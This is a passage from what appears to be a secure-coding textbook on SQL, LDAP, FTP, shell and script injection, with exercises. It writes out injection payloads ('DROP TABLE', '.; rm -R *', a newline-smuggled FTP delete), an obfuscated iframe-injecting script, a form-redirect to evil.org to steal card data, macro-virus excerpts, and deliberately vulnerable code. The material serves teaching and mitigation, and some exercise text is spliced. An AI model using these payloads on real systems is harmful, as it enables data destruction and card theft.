protocols, and shell or other command language interfaces.
SQL Injection
With the development of modern relational databases towards the end of the
1960’s, it became necessary to develop a powerful user interface so database
technicians could retrieve and modify the data stored therein. Command
interfaces were the state of the art at the time so a command interface was
developed as the primary user interface. The most successful such interface is
Structured Query Language (SQL), developed by IBM in the early 1970’s. Though
user interface technology has advanced greatly since the 1970’s, SQL remains the
most common database interface language to this day.
There are many common uses for databases in the typical e-commerce
application. Examples include finding the existence of a given record (username
paired with a password), retrieving data (generating a list of all the products in a
given category), and adding data (updating a price for an item in the inventory).
In each of these cases, inappropriate uses of the functionality could yield a severe
disruption to the normal operation of the web site. Since SQL clearly has the
descriptive power to allow a user to interface with the database in far more ways
than the policies would allow, it is up to the externally facing interface to convert
the user’s input into a valid and safe query. Vulnerabilities in this process yield
SQL injection attack vectors.
For example, consider a simple web application that prompts the user for a search
term. This term is placed in a variable called %searchQuery%. The user interface
then generates the following SQL statement:
SELECT * FROM dataStore WHERE category LIKE '%searchQuery%';
The details of SQL syntax and how this statement works are not important for this
example. The only thing you need to know is that there exists a table called
dataStore which contains all of the data the user may wish to query. This table
has a column called category containing the key or index to the table. When this
SQL statement is executed, a list of all the rows in dataStore matching
searchQuery will be generated.
To test this code, we will insert the term “rosebud” into %searchQuery%:
rosebud
From this, the following SQL statement will be generated:
SELECT * FROM dataStore WHERE category LIKE 'rosebud';
Enter Henry, a malicious hacker. Henry will attempt to execute an SQL statement
different from what the software engineer intended. He guesses that SQL was
utilized to implement this user interface and also guesses the structure of the
underlying SQL statement. Rather than enter “rosebud” into the user interface,
he will enter the following text:
x'; UPDATE dataStore SET category = 'You have been hacked!
The user interface places this odd-looking string into the variable
%searchQuery%. The end result is the following command sent to the SQL
interpreter:
SELECT * FROM dataStore WHERE category LIKE 'x';
UPDATE dataStore SET category = 'You have been hacked!';
Instead of executing a single, benign query, the interpreter first returns all rows
with category matching 'x'. When this is done, it then alters the category of
every row to read “You have been hacked!” In other words, Henry the hacker
successfully modified the table dataStore when the intent was only to be able
to view the table.
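The mechanics of the attack are visible if we simulate the user interface’s string construction (a sketch; the real interface may build the statement differently):

```python
# Simulate how the user interface builds the SQL statement from
# %searchQuery%.
def build_query(search_query):
    return ("SELECT * FROM dataStore WHERE category LIKE '"
            + search_query + "';")

honest = build_query("rosebud")
attack = build_query(
    "x'; UPDATE dataStore SET category = 'You have been hacked!")

# The honest input yields one SELECT; the attack input closes the
# string literal early and appends an UPDATE statement.
print(honest)
print(attack)
```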
For an SQL injection attack to succeed, the attacker needs to know the basic
format of the underlying query as well as have some idea of how the database
tables are organized. There are four main classes of SQL injection attacks: Union
Queries, Tautology, Comments, and Additional Statements.
Union Query Attack
The UNION keyword in SQL allows multiple statements to be joined into a single
result. This allows an SQL statement author to combine queries or to make a
single statement return a richer set of results. If the programmer is using this tool
to more powerfully access the underlying data, then this seems safe. However,
when this tool is harnessed by an attacker, an undesirable outcome may result.
Classification: Union
Vulnerability: For an SQL Union Query vulnerability to exist in the code, the following must
be present:
1. There must exist an SQL interpreter on the system.
2. User input must be used to build an SQL statement.
3. It must be possible for the user to insert a UNION clause into the end of
an SQL statement.
4. The system must pass the SQL statement to the interpreter.
Example of Vulnerable Code:
SELECT authenticate
FROM passwordList
WHERE name='$Username' and passwd='$Password';
Here the vulnerable part of the SQL statement is the $Password variable, which is
accessible from external user input. The intent is to create a query such as:
SELECT authenticate
FROM passwordList
WHERE name='Bob' and passwd='T0P_S3CR3T';
Resulting Query:
SELECT authenticate
FROM passwordList
WHERE name='Root' and passwd='nothing'
UNION SELECT authenticate
FROM passwordList;
The first query of the statement will likely fail because the password is probably
not “nothing.” However, the second query will succeed because it will return all
values in the passwordList table. For this to work, the attacker needs to be able
to insert the UNION keyword into the statement and generate another table with
the same number of expressions in the target list.
Mitigation: The complete approach would be to remove SQL from the workflow. If
that is not possible, another approach would be to filter input to remove UNION
statements.
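A filtering fallback might look like the following sketch (simple keyword matching only; a production filter would also have to consider alternate encodings and other evasions):

```python
# Reject any input containing the UNION keyword.
def contains_union(user_input):
    # SQL keywords are case-insensitive, so normalize before checking.
    return "union" in user_input.lower()

assert not contains_union("T0P_S3CR3T")
assert contains_union("nothing' UNION SELECT authenticate FROM passwordList")
```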
Tautology Attack
Consider an IF statement such as the following:
if (authenticated == true || bogus == bogus)
doSomethingDangerous();
Since the second clause always evaluates to true, the entire condition is true and
doSomethingDangerous() runs regardless of whether the user was authenticated. A
tautology attack injects just such an always-true clause into a query’s Boolean
expression.
Classification: Tautology
Vulnerability: For a SQL Tautology vulnerability to exist in the code, the following must be
present:
1. There must exist an SQL interpreter on the system.
2. User input must be used to build an SQL statement.
3. There must be a Boolean expression involved in a security decision.
4. The expression must contain an OR or it must be possible for the user to
insert an OR into the expression.
5. It must be possible for the user to make the OR clause always evaluate
to true.
6. The system must pass the SQL statement to the interpreter.
Example of Vulnerable Code:
SELECT authenticate
FROM passwordList
WHERE name='$Username' and passwd='$Password';
Here the $Password string must be accessible from external user input.
Resulting Query:
SELECT authenticate
FROM passwordList
WHERE name='Root' and passwd='nothing' OR 'x' = 'x';
Observe how the SQL statement was designed to restrict output to those rows
where the name and passwd fields match. With the tautology, the logical
expression (passwd='nothing' OR 'x' = 'x') is always true, so the attacker
does not need to know the password. For this attack vector to succeed, the
attacker needs to know the basic format of the query and be able to insert a
quote character.
Mitigation: The complete approach would be to remove SQL from the workflow. If
that is not possible, another approach would be to filter input to remove single
quotes or the OR keyword.
Comment Attack
Comments are a feature of SQL and other programming languages enabling the
programmer to specify text that is ignored by the interpreter. If an external user
is able to insert a comment into part of an SQL statement, then the remainder of
the query will be ignored by the interpreter.
Classification: Comments
Vulnerability: For an SQL Comment vulnerability to exist in the code, the following must
be present:
1. There must exist an SQL interpreter on the system.
2. User input must be used to build an SQL statement.
3. It must be possible for the user to insert a comment into the end of an
SQL statement.
4. The part of the SQL statement after the comment must be required to
protect some system asset.
5. The system must pass the SQL statement to the interpreter.
Example of Vulnerable Code:
SELECT authenticate
FROM passwordList
WHERE name='$Username' and passwd='$Password';
Here the vulnerable part of the SQL statement is the $Username variable, which
is accessible from external user input.
Resulting Query:
SELECT authenticate
FROM passwordList
WHERE name='Root'; -- and passwd='nothing';
In this example, the second part of the query is commented out, meaning data
will return from the query if any user exists with the name “Root” regardless of
the password. The attacker has, in effect, simplified the query.
Mitigation: The complete approach would be to remove SQL from the workflow. If
that is not possible, another approach would be to filter input to remove
comments.
Note that not all underlying queries can be exploited by the comment attack. If,
for example, passwd='$Password' was the first clause in the Boolean
expression, then it would be much more difficult to exploit.
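The truncation effect can be demonstrated by simulating the query construction (a sketch mirroring the vulnerable statement above):

```python
# Simulate how the '--' comment truncates the password check.
def build_query(username, password):
    return ("SELECT authenticate FROM passwordList WHERE name='"
            + username + "' and passwd='" + password + "';")

attack = build_query("Root'; -- ", "nothing")
print(attack)
# Everything after the '--', including the entire password clause,
# is ignored by the SQL interpreter.
```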
Additional Statement Attack
Another class of SQL vulnerabilities stems from some of the power built into the
SQL command suite. Adding an additional statement in an SQL query is as simple
as adding a semi-colon to the input. As with C++ and a variety of other languages,
a semi-colon indicates the end of one statement and the beginning of a second.
By adding a semi-colon, additional statements can be appended onto an SQL
command stream:
Vulnerability: For an SQL Additional Statement vulnerability to exist in the code, the following
must be present:
1. There must exist an SQL interpreter on the system.
2. User input must be used to build an SQL statement.
3. The user input must not filter out a semi-colon.
4. The system must pass the SQL statement to the interpreter.
Example of Vulnerable Code:
SELECT authenticate
FROM passwordList
WHERE name='$Username' and passwd='$Password';
Here the vulnerable part of the SQL statement is the $Username variable, which
is accessible from external user input.
Resulting Query:
SELECT authenticate
FROM passwordList
WHERE name='Root' and passwd='nothing';
INSERT INTO passwordList
(name, passwd) VALUES ('Bob', '1234');
In this example, the attacker is able to execute a second command where the
author intended only a single command to be executed. This command will
create a new entry in the passwordList table, presumably giving the attacker
access to the system.
Mitigation: The complete approach would be to remove SQL from the workflow. If
that is not possible, another approach would be to filter input to remove semi-colons.
Clearly additional statements are among the most severe of all SQL injection
vulnerabilities. With it, the attacker can retrieve any information contained in the
database, can alter any information, can remove any information, and can even
physically destroy the servers on which the SQL databases reside.
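The statement-splitting behavior can be simulated directly (a sketch; a real interpreter performs proper parsing rather than the naive split used here):

```python
# Simulate the additional-statement construction.
def build_query(username, password):
    return ("SELECT authenticate FROM passwordList WHERE name='"
            + username + "' and passwd='" + password + "';")

attack = build_query(
    "Root",
    "nothing'; INSERT INTO passwordList (name, passwd) VALUES ('Bob', '1234'); --")

# The injected semi-colons turn one intended statement into several.
statements = [s for s in attack.split(";") if s.strip()]
print(len(statements))
```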
LDAP Injection
The Lightweight Directory Access Protocol (LDAP) is a directory service protocol
allowing clients to connect to, search for, and modify Internet directories
(Donnelly, 2000). Through LDAP, the client may execute a collection of commands
or specify resources through a large and diverse language. A small sampling of
this language is:
ou Organizational unit, such as: ou=University
dc Part of a compound name, such as: dc=www,dc=byui,dc=edu
cn Common name for an item, such as: cn=BYU-Idaho
homedirectory The root directory, such as: homedirectory=/home/cs470
Code vulnerable to LDAP injection attempts may allow access to resources that
are meant to be unavailable.
Classification: Disclosure
Vulnerability: For an LDAP vulnerability to exist in the code, the following must be present:
1. There must exist an LDAP interpreter on the system.
2. User input must be used to build an LDAP statement.
3. It must be possible for the user to insert a clause into the end of an LDAP
statement.
4. The system must pass the LDAP statement to the system interpreter.
Resulting Code: When the user input is inserted into the LDAP string, the following LDAP is
created:
(cn=score.txt, homedirectory=/home/forbidden/)
Mitigation: The best mitigation strategy is to carefully filter input and ensure no LDAP
keywords are used.
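The vulnerable construction is not shown above, but a hypothetical search template of the form (cn=$fileName) would produce exactly the resulting code listed. The template in this sketch is an assumption for illustration, not taken from the text:

```python
# Hypothetical LDAP filter template; the user's input replaces
# $fileName with no validation.
def build_filter(file_name):
    return "(cn=" + file_name + ")"

benign = build_filter("score.txt")
attack = build_filter("score.txt, homedirectory=/home/forbidden/")
print(benign)   # (cn=score.txt)
print(attack)   # (cn=score.txt, homedirectory=/home/forbidden/)
```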
FTP Injection
Before the emergence of web browsers on the Internet, the most common way
to retrieve files was through File Transfer Protocol (FTP) and through the Gopher
system. While the latter has been largely deprecated, FTP is still commonly used
as a command line file transfer mechanism for users and applications. In this
scenario, commands are sent from the client in text format to be interpreted and
executed by the server.
FTP injection may occur when, like SQL injection, an attacker is able to send a
different FTP command than was intended by the programmer. Through an
understanding of how user input is used to create FTP commands, it may be
possible to trick the client into sending arbitrary FTP commands using the client’s
credentials.
Vulnerability: For an FTP Additional Statement vulnerability to exist in the code, the following
must be present:
1. There must exist an FTP interpreter on the system.
2. User input must be used to build an FTP statement.
3. The user input must not filter out a newline.
4. The system must pass the FTP statement to the interpreter.
Example of Vulnerable Code: Here the vulnerable part of the statement is the $filename variable, which is
accessible from external user input. The intent is to create an FTP statement in
the form of:
RETR <FILENAME>
Resulting Query:
RETR mydocument.html
RMD .
This will serve both to retrieve the user’s file as intended and to remove the
current working directory (the function of RMD .).
Mitigation: The complete approach would be to remove FTP from the workflow. If
that is not possible, careful filtering of user input is required. This should at a
minimum filter out the newline character.
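The newline is the critical character because FTP commands are line-delimited; the attack above can be simulated as a string construction (a sketch):

```python
# Simulate the FTP command construction.
def build_ftp_command(file_name):
    # Mirrors: RETR <FILENAME>
    return "RETR " + file_name

# An embedded newline smuggles a second command into the stream.
attack = build_ftp_command("mydocument.html\r\nRMD .")
commands = attack.splitlines()
print(commands)   # ['RETR mydocument.html', 'RMD .']
```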
Shell Injection
Most programming languages provide the programmer with the ability to pass a
command directly to the operating system’s command interpreter. These
commands originate from the program as a textual string and then get
interpreted as a command. The text is then processed as if a user typed the
command directly from the command prompt.
Many programming languages provide the functionality to send commands to the
operating system interpreter. The following is a hopelessly incomplete list
provided as an example:
Java Runtime.getRuntime().exec(command);
C++ system(command);
C# Process.Start(new ProcessStartInfo("CMD.exe", command));
Python subprocess.call(command, shell=True)
PHP exec($command);
Node.js (JavaScript) child_process.exec(command, function(error, data) {});
Perl system($command);
Visual Basic .NET MSScriptControl.ScriptControl.Eval(command)
Swift shell(command, []);
Ruby `#{command}`
As with SQL injection, LDAP injection, and FTP injection, shell injection
necessitates user input making it to the interpreter. Providing access to the
underlying command interpreter opens the door to a command injection
vulnerability but it does not guarantee the existence of one. The extra required
step is user input.
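In Python, for example, whether the shell ever sees the user’s text depends on how the call is made. The following sketch contrasts the two forms using the standard subprocess module:

```python
import subprocess

user_input = ".; rm -R *"

# Dangerous form: the whole string is handed to the shell, which
# honors the ';' and would run both commands.
#   subprocess.call("ls " + user_input, shell=True)

# Safer form: the argument list bypasses the shell, so the entire
# string is passed to 'ls' as one literal (non-existent) file name.
result = subprocess.run(["ls", user_input], capture_output=True)
print(result.returncode)   # non-zero: 'ls' found no such file
```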
Classification: Additional Statements
Vulnerability: For shell injection vulnerabilities to exist in the code, the following must be
present:
1. A mechanism must exist to send text to the operating system command
interpreter.
2. The text must be accessible through user input.
In C++, we can send commands to the command prompt through the system()
function. Consider the following code:
#include <iostream>
#include <cstdlib>
#include <string>
using namespace std;

int main()
{
   // List the contents of a directory named by the user.
   string dirName;
   getline(cin, dirName);
   system(("ls " + dirName).c_str());
   return 0;
}
Exploitation: An attacker can take advantage of this design by placing two commands on the
line where only one was expected. This could be accomplished with the string:
.; rm -R *
Resulting Query:
ls .; rm -R *
If this code were to be executed, the current directory will be listed and then
removed.
Mitigation: Remove the system call from the code and use another way to provide a directory
list.
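In Python terms, the same mitigation replaces the shell call with a library call that never touches a command interpreter (a sketch):

```python
import os

# Instead of system("ls " + dirName), enumerate the directory with a
# library call; no command interpreter ever sees the user's input.
def list_directory(dir_name):
    return sorted(os.listdir(dir_name))

# A hostile "directory name" is now just an inert path string:
try:
    entries = list_directory(".; rm -R *")
except FileNotFoundError:
    entries = None   # no such directory, and nothing was executed
print(entries)
```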
Examples
1. Q Identify three examples of malicious user input which could exploit the
following:
id = getRequestString("netID");
query = "SELECT * FROM Authentication WHERE netID = " + id
A Three solutions:
x Tautology Attack: "1 or 1=1". This will always evaluate to true regardless of
the contents of Authentication.
SELECT * FROM Authentication WHERE netID=1 or 1=1;
x Additional Statement Attack: “1; DROP TABLE Authentication” . This will fail the
SELECT statement but the next statement will destroy the Authentication
table.
SELECT * FROM Authentication WHERE netID = 1; DROP TABLE Authentication;
x Union Query Attack: “1 UNION SELECT Authenticate FROM userList”. This will
append a second query onto the first which will succeed.
SELECT * FROM Authentication WHERE netID = 1
UNION SELECT Authenticate FROM userList;
2. Q Consider the following PHP code exhibiting a command injection vulnerability:
<?php
$command = 'type ' . $_POST['username'];
exec($command, $res);
x The code can be mitigated by using another means to get a file listing:
<?php
if (is_dir($_POST['username']))
{
if ($directory = opendir($_POST['username']))
{
while (($file = readdir($directory)) !== false)
echo $file . '<br>';
closedir($directory);
}
}?>
Exercises
1 Define in your own words the following terms:
x Command Injection
x SQL Injection
x FTP Injection
x SHELL Injection
x Tautology Vulnerabilities
x UNION Query Vulnerabilities
x Additional Statement Vulnerabilities
x Comment Vulnerabilities
connection.Open();
command.ExecuteNonQuery();
connection.Close();
4 For the following PHP code, answer the following questions:
x What is the code meant to do?
x What is the vulnerability?
x How can it be exploited?
x How should it be mitigated?
<?php
$host = 'byui.edu';
if (isset( $_GET['hostName'] ) )
$host = $_GET['hostName'];
system("/usr/bin/nslookup " . $host);
?>
<form method="get">
<select name="host">
<option value="server1.com">one</option>
<option value="server2.com">two</option>
</select>
<input type="submit"/>
</form>
?>
6 For the following PHP code, answer the following questions:
x What is the code meant to do?
x What is the vulnerability?
x How can it be exploited?
x How should it be mitigated?
<?php
$value = $argv[0];
$query = "SELECT id, name " .
"FROM products " .
"ORDER BY name " .
"LIMIT 100 OFFSET $value;";
$result = odbc_exec($connection_id, $query);
?>
Problems
1 According to Friedl, there are four steps to exploiting a SQL vulnerability. How
can we introduce roadblocks at every step of the process?
x Identify that the user input is used to construct a SQL query.
x Guess the underlying structure of the query.
x Determine the table and field names.
x Manipulate the queries to yield the desired outcome.
return 0;
}
4 Find an article describing a real SQL injection attack. This could be a news story,
a technical explanation, or a description of the cleanup that resulted.
Chapter 06: Script Injection
Script injection vulnerabilities are among the most common on the web today. Knowing how to find them
and fix them is a core software engineering skill.
The original document file formats developed in the 1970’s consisted only of user
data. It was impossible to embed commands or other types of code in a
document. This changed when Lotus 1-2-3 version 2 introduced a macro language
to their file format. Through this capability, a 3rd party developer could implement
functionality that did not exist in the original released product. With this added
power, Lotus 1-2-3 became a popular platform for custom 3rd party solution
providers.
Script injection arises when an attacker is able to execute commands on a
victim’s computer beyond those which are allowed by policy.
Document macros and scripts are two mechanisms to extend the power of a
platform by giving authors the ability to execute code on a client’s computer.
Macro and scripting languages are designed to be powerful for this very reason.
With this power, however, comes the opportunity for malicious users to embed
programs in seemingly benign documents that compromise a victim’s
computational resources. Harold Highland first described the possibility of macro
malware in 1989 and it was successfully demonstrated in March of that year,
more than six years before the first macro virus was found in the wild.
Script injection is a class of vulnerabilities where a malicious user is able to
execute commands on a victim’s computer beyond those which are allowed by
system policy. There are two components to this definition. Each will be
examined in depth.
Interpreter: The victim’s computer must provide a mechanism for outside users to execute
commands. Thus, like command injection studied earlier, an interpreter must
exist on the victim’s system. The big difference between command injection and
script injection is that the victim intentionally provides the outside user with
access to the interpreter. In the case of the typical e-commerce scenario, the
victim will run a browser with JavaScript enabled so an outside user (the e-
commerce site itself) can execute commands. Script injection cannot exist if the
victim does not provide the outside user with a command interpreter.
Policy: For script injection to occur, there must be a distinction between that which is
allowable and that which is not. When scripting was implemented on a client
system, it was clearly designed to provide an extra degree of functionality to the
user. Thus there must be a degree of functionality that is specifically allowable
and desirable. Script injection only occurs when this provided degree of
functionality exceeds what is safe. For example, consider JavaScript in an e-
commerce application. It is desirable for the JavaScript to validate the user input
data in a web form to ensure it is the correct format. It is not desirable for the
JavaScript to erase the user’s documents on the client computer. The former
adheres to system policy and is thus not script injection whereas the latter
violates system policy and thus can be classified as script injection.
Script injection occurs when either the interpreter has a defect allowing actions
to occur which are outside the design, or when the policy of the interpreter is
different than that of the system the interpreter is meant to serve.
For example, consider the common scripting language JavaScript. This language
is designed to operate within a “sandbox,” namely it is designed to have no
interaction with the operating system outside a well-defined boundary. What
would happen if there were a bug with the JavaScript interpreter on a common
web browser? Specifically, what if Google Chrome allowed an extra command to
exist which is outside the JavaScript ECMAScript 3.1 specification allowing for
access to the file system? This defect in the interpreter would thus be a script
injection vulnerability.
Another example would be when the policy of the interpreter is different from
that of the application using the scripting engine. JavaScript is a scripting language
that, by design, has access to the document surface. This allows a JavaScript
program to read data from the currently displayed web page. All of this is in line
with the policy of the interpreter. An e-commerce web site such as Amazon would
probably have a policy prohibiting the author of a customer review to have access
to the shopping cart. Imagine a customer who wrote a review containing
JavaScript. This JavaScript would have complete access to the page, including the
shopping cart! The result is more access than Amazon intended, a script injection
vulnerability. To mitigate this vulnerability, Amazon needs to remove all instances
of JavaScript in customer reviews.
There are two main flavors of script injection attacks: direct and reflected. Direct
script injection occurs when a malicious outside user authors a document with an
embedded script and sends the document directly to the victim. Reflected script
injection occurs when an outside user places a malicious document on a host
computer which is then opened by the victim.
Direct Script Injection
A Direct Script Injection attack occurs when the attacker sends a document with
an embedded malicious script directly to the victim. This may occur when the
victim opens an e-mail attachment with a script attached or when the victim visits
a web site with embedded scripts. In each case, the following prerequisites must
be met:
1. Scripting Functionality: The document file format must support scripting. This is not the case with .TXT,
.GIF, or .DOCX files. Many document viewers support scripting, including web
browsers and e-mail clients as well as several document editors, music players,
and picture viewers. Additionally, the victim must have scripting enabled on his
document viewer. Most document viewers have scripting on by default and not
all document viewers even have the ability to disable scripting.
2. Malicious Code: Many scripting languages do not give the programmer the ability to compromise
the confidentiality, integrity, or availability needs of the user. The process of
limiting scripting power for this purpose is called "sand-boxing." When a script
has the power to do the user harm, the potential for Direct Script Injection
attacks is present.
3. Victim Opens the Document: The final condition is that the victim must be convinced to open the
document containing the payload script. Attackers commonly use social
engineering techniques to fulfill this final requirement.
The potential and severity of direct script injection attacks depend greatly on the
power vested in the scripting engine. In the early days of macros and scripting,
little attention was paid to this fact; macro and scripts were given vast power so
more useful programs could be executed. As a result, early direct script injection
attacks were severe. Today, great care is placed in defining and curtailing the
power of these scripting engines. In all cases, the first step to understanding
direct script injection is to become deeply acquainted with the associated
scripting engine.
Mitigation
As with command injection vulnerabilities, there are three ways to mitigate direct
script injection:
Complete: Complete mitigation is to remove any possibility of script injection by removing
the interpreter. This is one of the main techniques used today. Most modern file
formats do not have macro or scripting functionality. Even the web is moving
away from scripting. HTML5 is designed, in many ways, as a replacement for
scripting.
Strong: A strong approach is to white-list those constructs which are allowable. For the
most part, this involves limiting the interactions between the scripting language
and the document surface.
Weak: A weak approach is to black-list those constructs known to be dangerous. This is
particularly difficult when there are many ways to accomplish the same task.
WordBASIC
Following Lotus’ introduction of a macro language for 1-2-3, a large number of
custom applications were written for the platform. Many companies tried to
replicate Lotus’s success, not the least of which was Microsoft. Seeing the vast
potential for scripting in a word processor and eager to give the application
developers as much power as possible, Microsoft introduced WordBASIC in 1989.
This macro language was built on Microsoft QuickBASIC but had many tie-ins
to the Microsoft Word document surface. For example, the following would place
the bold text “WordBASIC” on the document surface:
Sub MAIN
Bold 1
Insert "WordBASIC"
End Sub
In 1995, the first script injection virus (called “macro virus” at the time) called
Concept was released (Bezroukov, 1999). The name came from the fact that the
virus had no payload, only the following comment:
Sub MAIN
REM That’s enough to prove my point
End Sub
The virus spread because, whenever a .doc document is opened, Word looks for
a macro named AutoOpen. If that macro exists, then the contents are immediately
executed. Concept’s AutoOpen contained code to copy itself to all other open .doc
files. The code in AutoOpen is:
If Not bInstalled And Not bTooMuchTrouble Then
'add FileSaveAs and copies of AutoOpen and FileSaveAs.
'PayLoad is just for fun.
iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
sMe$ = FileName$()
sMacro$ = sMe$ + ":Payload"
MacroCopy sMacro$, "Global:PayLoad"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:FileSaveAs"
sMacro$ = sMe$ + ":AAAZFS"
MacroCopy sMacro$, "Global:AAAZFS"
sMacro$ = sMe$ + ":AAAZAO"
MacroCopy sMacro$, "Global:AAAZAO"
During 1997, the harmless Concept virus was the most common piece of malware
in the wild, accounting for about one half of all infections. Microsoft itself
unknowingly included copies of Concept on CDs sent to customers and affiliates.
The main result of the Concept event was to awaken the world to the potential of
script injection.
Observe how all three prerequisites for script injection were met:
1. Scripting Functionality: All copies of Microsoft Word had scripting enabled.
2. Malicious Code: The WordBASIC language had sufficient power to replicate and cause the victim
harm.
3. Victim Opens the Document: It was common to pass documents via e-mail in the 1990s.
On the 26th of March, 1999, David Smith released the Melissa virus into the wild
from his home in New Jersey. By the end of the day, several large corporations
were compelled to suspend their e-mail servers. Though there was no malicious
payload associated with Melissa, between $80 million and $1.1 billion in damages
and lost service resulted from the outbreak. Through a collaboration of law
enforcement officers around the world, Smith was identified as the originator of
the virus and was sentenced on the 9th of December, 1999. Said Smith, “In fact, I
included features designed to prevent substantial damage... I had no idea there
would be such profound consequences to others.” He received a prison sentence
of 5 years.
The Melissa virus ran in VBA and was modeled after the Concept WordBASIC virus.
The avenue of spreading was e-mail. Usually the subject would say "Important
message from <sender>" and an infected Word .doc would be the attachment.
The macro also contained a check for a registry key named “Melissa?” in which
the value was “… by Kwyjibo”. If the registry key existed, then the macro would
not spread. It is from the key name Melissa that the virus got its name and Kwyjibo
was David Smith’s alias. David used the name Melissa because it was the name of
a woman of ill repute who lived in Florida.
The following code appeared at the end of the macro:
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it’s a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText
" Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters.
Game’s over.
I'm outta here."
End Sub
Observe how the three prerequisites for direct script injection were present in the
Melissa virus:
1. Scripting Functionality: The .DOC, .XLS, and .PPT file formats support VBA. Similarly, scripting was
enabled by default on all installations of Microsoft Office '97.
2. Malicious Code: VBA had extensive power to interact with documents, modify templates, interact
with the file system, and modify the user interface.
3. Victim Opens the Document: Document sharing through e-mail attachments was very popular and
considered safe.
In the wake of the Melissa virus, Microsoft included a black-list filter to remove
all macros matching Melissa’s signature. Of course, this filter was easy to
circumvent. A more comprehensive solution followed in Office 2007. Here
the .DOCX format was introduced which, among other things, lacked the ability
to host macros. If a user wished to have a macro-embedded document, the .DOCM
extension was required. This small change largely put an end to VBA macro
viruses.
JavaScript
At the end of 1995, Netscape introduced JavaScript as the first scripting language
in a web browser. JavaScript introduced the notion of a “sand-box:” tight
restrictions on the influence of a script to the user’s computer. These restrictions
include no file-system access, inability to establish a network connection, and the
inability to access other web pages displayed by the browser (called “same-
origin”). Despite these restrictions, several examples of Direct Script Injection
have resulted from JavaScript vulnerabilities.
For example, consider the following JavaScript found in a hacked site:
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+
((c=c%a)>35?String.from
CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--
){d[e(c)]=k[c]||e(c)}k=[function(e){return
d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5
0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o
.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-
1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do
cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get
ElementById|function|createElement|iframe|appendChild|src|id|nl|msie|
toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navi
gator|ai| showthread|php|72241732'.split('|'),0,{}))
</script>
The author went through a great deal of trouble to make the intent difficult to
understand. It can be simplified to:
document.write("<iframe src='http:// malicious.com/in.php?a=UNIQUE-ID'
style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
1. Scripting Functionality: JavaScript has become a common addition to virtually all HTML scenarios
(such as web browsing, e-mail, help, and forms). Note that JavaScript is on by
default in most HTML scenarios.
2. Malicious Code: JavaScript has sufficient power to implement key-logging spyware, pop-up
adware, and spoofing trojans.
3. Victim Opens the Document: Most computer users view dozens of HTML pages every day.
The code gets placed at the top of this young web engineer’s page and, to his
surprise, everything from “really” down to the bottom of the page starts blinking.
In other words, the malicious user is able to deface the page and make it difficult
to read (Champeon, 2000).
How did this happen? Three parties are needed: the attacker, the host, and the
victim. In the above scenario, the attacker is the user who adds the <blink> tag
to the comment field. The host is the web site that holds the malicious user’s text
and displays it to a victim. The victim is the individual who views the web page.
XSS occurs when an attacker is able to place content or code on a host’s web site
that is against the host’s policy. This content or code then has an undesirable
effect for the victim. In this case, the attacker was able to place a <blink> tag on
a web page residing on the host’s web page. For a reflected script injection attack
to occur, the following steps must take place:
Step 1: Create the Payload. It must be possible to perform some action that is outside the host's policy
and is undesirable for the victim. In other words, the potential to do harm must
exist given the technology the host is using. This usually means that the
JavaScript interpreter is available. In the simple example presented above, the
payload is the <blink> tag.
Step 2: Insert Payload Onto Host. The attacker must be able to insert the payload onto the host web
site. If the attacker does not have the ability to post content onto a host web
page or if the host is able to filter out the attacker's payload, then no reflected
attack is possible. In the example above, the user comment mechanism is the
attack vector through which the attacker is able to insert the payload onto the
host.
Step 3: Victim Views the Page. The victim must view a page from the host with the attacker's payload.
If the host does not serve the page to the victim or if the victim does not render
the page, then a reflected attack is not possible. In the above example, the other
user must view the web page.
Step 4: Exploitation. The payload must have the ability to cause harm to the victim or the host. In
the above example, the page is unreadable because large tracts of text are
blinking.
Mitigation
As with direct script injection attacks, there are many ways to mitigate XSS
attacks:
Complete: The safest way to stop all script injection attacks is to disable the interpreter.
Unfortunately, most web scenarios do not work without scripting enabled. In
other words, we may succeed in preventing one type of attack only to introduce
a denial-of-service.
Strong: When complete mitigation is not possible, the next safest thing to do is to
enumerate the safe constructs that are allowed on a host's site. In the <blink>
scenario, the web engineer could list all HTML tags that are allowable (such as
bold, underline, and hyperlink). Any tag not present on this safe list is then
filtered out.
Weak: A weak approach is to black-list constructs that are known to be dangerous. In
this case, we could filter out all <blink> tags. Note that there may be a variety
of other ways to introduce blinking into a web page (such as through CSS) or other
ways to deface the site. In other words, weak mitigation with black lists is not a
very reliable way to solve this problem.
Tag Manipulation
The first type of XSS involves the attacker manipulating the structure of a web
page. For example, consider the following HTML code:
<form id="forms" action="/processRequest.php">
Credit card number: <input type="text" name="number"/><br/>
Expiration date: <input type="text" name="date"/><br/>
Card validation value: <input type="text" name="cvv2"/><br/>
<input type="submit" value="Submit"/>
</form>
This code, similar to that which you could find on many e-commerce sites,
prompts the user for their credit card number, the expiration date, and the card
validation value. The resulting data is then sent to “processRequest.php.”
The attacker wishes to receive this information for the purpose of making an
illegal purchase. To do this, he wishes to change “processRequest.php” to
“evil.org/processRequest.php”. This simple change will redirect the credit
card payload to evil.org. The attacker can do this through tag manipulation.
In the above example, there exists a banner ad. The HTML code for the ad is
inserted directly into the web page containing the credit card request. The format
of the banner ad is the following:
<a href="www.someWebPage.com"><img src="www.someWebPage.com/src.jpg"/></a>
Our attacker, however, submits the following code for the banner ad:
<a href="www.mySite.com">
<script>
document.getElementById('forms').action = "evil.org/processRequest.php";
</script>
<img src="www.mySite.com/src.jpg"/>
</a>
